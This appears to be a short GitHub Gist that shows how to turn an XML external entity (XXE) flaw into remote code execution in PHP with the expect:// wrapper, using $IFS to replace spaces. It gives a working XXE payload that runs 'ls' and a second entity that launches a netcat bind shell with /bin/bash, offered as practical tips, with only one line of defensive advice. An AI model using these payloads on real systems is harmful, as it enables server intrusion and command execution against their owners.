Last active
November 15, 2021 08:30
-
-
Save mosesrenegade/d81c5ca134e6b65f93422a8c09ba681b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
What follows below is how to trigger an RCE with PHP using the Expect Wrapper. The problem is that spaces are not interpreted correctly. Here is a great tip: Use the $IFS (Internal Field Seperator in Bash). Another pro tip: Don't allow for XXE. | |
https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 | |
``` | |
<?xml version="1.0"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]> | |
<entry> | |
<subject>&xxe;</subject> | |
<category>Test</category> | |
<text>Test</text> | |
</entry> | |
``` | |
You need to also wrap any arguments that are numbers or potentially specifically special characters in string quotes. | |
``` | |
<!ENTITY xxe SYSTEM "expect://nc$IFS-nvlp$IFS'3334'$IFS-e$IFS'/bin/bash'">]> | |
``` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment